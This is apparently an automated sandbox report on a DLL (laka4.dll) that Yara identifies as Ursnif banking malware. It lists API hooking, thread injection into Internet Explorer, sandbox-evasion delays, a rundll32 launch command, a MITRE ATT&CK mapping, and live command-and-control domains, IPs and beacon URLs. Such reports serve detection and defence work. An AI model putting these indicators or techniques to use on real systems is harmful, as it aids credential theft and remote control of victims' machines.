Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\regsvr32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\loaddll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6924	Thread sleep count: 75 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6416	Thread sleep count: 51 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6416	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6416	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6416	Thread sleep count: 66 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6416	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6416	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6416	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6416	Thread sleep count: 149 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007D7DA3 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		0_2_007D7DA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F47DA3 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		2_2_00F47DA3

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Program Files\internet explorer\iexplore.exe	Section loaded: unknown target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Section loaded: unknown target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Section loaded: unknown target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Section loaded: unknown target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Section loaded: unknown target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Section loaded: unknown target: unknown protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Program Files\internet explorer\iexplore.exe	Thread register set: target process: 6528	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Thread register set: target process: 5064	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Thread register set: target process: 6708	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Thread register set: target process: 4172	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Thread register set: target process: 5584	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Thread register set: target process: 6972	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\laka4.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_007D3C3A cpuid

0_2_007D3C3A

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_007D947A HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,

0_2_007D947A

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_007D3C3A RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_007D3C3A

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_007DA499 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_007DA499

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.838142140.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857625114.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909665638.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.959293774.00000000054AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905711954.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905674059.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857795473.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.938999366.00000000031BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857776316.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905782753.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905833677.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909829429.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857683077.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909904535.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857820386.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857808720.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838200660.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909762591.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857714581.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1009913837.000000000541C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838181374.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909865416.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909891092.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909848147.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838052469.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838002362.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905819560.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909807581.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1013072792.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838240951.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857756795.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838099477.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905803436.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905753199.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.837840447.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905845684.0000000005618000.00000004.00000040.sdmp, type: MEMORY

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000018.00000003.775701050.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.780693607.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.766624106.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.764888743.0000000002F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.763148290.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.3.loaddll32.exe.bda481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.2f4a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.rundll32.exe.311a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.f4a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.2e1a481.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.838142140.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857625114.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909665638.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.959293774.00000000054AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905711954.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905674059.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857795473.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.938999366.00000000031BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857776316.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905782753.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905833677.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909829429.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857683077.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909904535.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857820386.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857808720.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838200660.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909762591.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857714581.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1009913837.000000000541C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838181374.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909865416.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909891092.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909848147.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838052469.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838002362.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905819560.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909807581.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1013072792.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838240951.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857756795.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838099477.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905803436.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905753199.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.837840447.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905845684.0000000005618000.00000004.00000040.sdmp, type: MEMORY

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000018.00000003.775701050.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.780693607.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.766624106.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.764888743.0000000002F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.763148290.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.3.loaddll32.exe.bda481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.2f4a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.rundll32.exe.311a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.f4a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.2e1a481.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	DLL Side-Loading1	Process Injection211	Rootkit4	Credential API Hooking3	System Time Discovery1	Remote Services	Credential API Hooking3	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	DLL Side-Loading1	Masquerading1	LSASS Memory	Query Registry1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution1	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion11	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection211	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Regsvr321	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	DLL Side-Loading1	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
laka4.dll	4%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.rundll32.exe.2f60000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
2.2.regsvr32.exe.f40000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
0.2.loaddll32.exe.7d0000.0.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
24.2.rundll32.exe.3150000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File

Domains

Source	Detection	Scanner	Label	Link
silugerude.xyz	1%	Virustotal		Browse
vilugerude.xyz	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://vilugerude.xyz/favicon.ico~	0%	Avira URL Cloud	safe
http://vilugerude.xyz/palok/ISxtPb9NBDRdKdPIDnGulH/UHMvfd9n0X2gt/HgBUH102/d1m0OPwBZ0XynInWe6FU1aI/20	0%	Avira URL Cloud	safe
http://vilugerude.xyz/palok/dFnfMK1xAnp5I7t/YmapWF7tOTYN7Dd_2B/6kHZ1aN0G/zjxUimz2MEw0rWfqLZLJ/gCkKKi	0%	Avira URL Cloud	safe
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
http://vilugerude.xyz/palok/02XIlHxdbtKM8P3i3ca/47BqsC6_2FhAXQycTT8tDA/RUNfA0sZ_2BZr/1jh8HIyV/8yUbmY	0%	Avira URL Cloud	safe
http://vilugerude.xyz/palok/vUdO_2B4IZ3J_2Bd6F3sVbz/0bLr6U_2BT/ty33Mhp8Qlrf5CraM/knAI6s31dF0P/5ITH10	0%	Avira URL Cloud	safe
http://vilugerude.xyz/palok/ZSXFTmnkcje5EOH/umoJg5Byr3I9szhZzJ/RAjbLNU7_/2BKMDUk3G_2Bo_2FwnsZ/OrQwr5	0%	Avira URL Cloud	safe
http://vilugerude.xyz/palok/taR_2BUDt4igM2RX/qZ890U_2FvXmpm7/kLlTmzjbCaxzLI30UD/sG2rHuNAE/XyrX_2Fzhy	0%	Avira URL Cloud	safe
http://vilugerude.xyz/palok/CW13K5mE2c3xbRAfZePcI/XEak48G8SmMzV00N/TmMgf_2FUC_2FO8/q1mZ7RFRjJFdb0E2U	0%	Avira URL Cloud	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
http://silugerude.xyz/palok/JYNgnm_2BBHAequLwRjE0/wog2aPyjIrhfiChj/_2F7KNmTOp7gcHK/jNoiBVFK7FGrcvPg_	0%	Avira URL Cloud	safe
http://silugerude.xyz/palok/Ypgl4JI_2FR/m0yEq7_2B7ljWe/BPm0RVhpDIfFWYr2d3BFy/aXhI5T_2B9mwNkry/hFC_2F	0%	Avira URL Cloud	safe
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	URL Reputation	safe
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	URL Reputation	safe
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	URL Reputation	safe
http://silugerude.xyz/palok/TFAutzbu/gCe3ncCBLMH7DreC61qLPHX/ngaLnwVCvh/xXteQjB63wWsF2t6A/Zz_2BRALS7	0%	Avira URL Cloud	safe
http://vilugerude.xyz/palok/t9KapG5Lp7Zt_2Fa57QG/GX7NNpbipoY4mmC8m9o/47gVROA6RCGhiLCLu_2F0K/y86ol3pt	0%	Avira URL Cloud	safe
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/en-us?"	0%	Avira URL Cloud	safe
http://silugerude.xyz/palok/BCk7mFxSRy/Qm0SzTs5dMXdNL8SU/P_2BkhEGcRW5/U9Vx3mh5hRK/dX0HNPUxJl8j6m/IQf	0%	Avira URL Cloud	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html	0%	URL Reputation	safe
https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html	0%	URL Reputation	safe
https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
http://vilugerude.xyz/palok/neoLoiiKtwHl6QdM4A/f0O2DxWQo/5EJl2Tz8iA7cOU69VgBA/IeUG6sell9ZjI6yQKow/fY	0%	Avira URL Cloud	safe
http://vilugerude.xyz/palok/qo_2FTJl/jnoEfVMzZHt3_2BMW0xDKGO/M1Kxv2lNpc/7gbEDrc_2F2egCapG/TuTROOPwVO	0%	Avira URL Cloud	safe
http://vilugerude.xyz/palok/aOnuW4Kc8kOdYhrgG/HHSmkSFK_2Fd/FqiAyDyS_2B/Bifl3Bed0SdPBr/pMym6LPCFFnLXB	0%	Avira URL Cloud	safe
http://vilugerude.xyz/favicon.ico	0%	Avira URL Cloud	safe
http://vilugerude.xyz/palok/ByknSZ2tON9683wB1nz_2/FXwcC_2Ftu5SOLf_/2B2lhXejD0yHkC3/naPotBkzM8oI0dYk3	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
contextual.media.net	184.30.24.22	true	false		high
silugerude.xyz	185.186.245.157	true	true	1%, Virustotal, Browse	unknown
hblg.media.net	184.30.24.22	true	false		high
lg3.media.net	184.30.24.22	true	false		high
resolver1.opendns.com	208.67.222.222	true	false		high
geolocation.onetrust.com	104.20.185.68	true	false		high
vilugerude.xyz	185.186.245.185	true	true	1%, Virustotal, Browse	unknown
web.vortex.data.msn.com	unknown	unknown	false		high
www.msn.com	unknown	unknown	false		high
srtb.msn.com	unknown	unknown	false		high
cvision.media.net	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://searchads.msn.net/.cfm?&&kp=1&	{3BB1EF45-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false		high
http://vilugerude.xyz/favicon.ico~	imagestore.dat.5.dr	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.10.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.10.dr	false		high
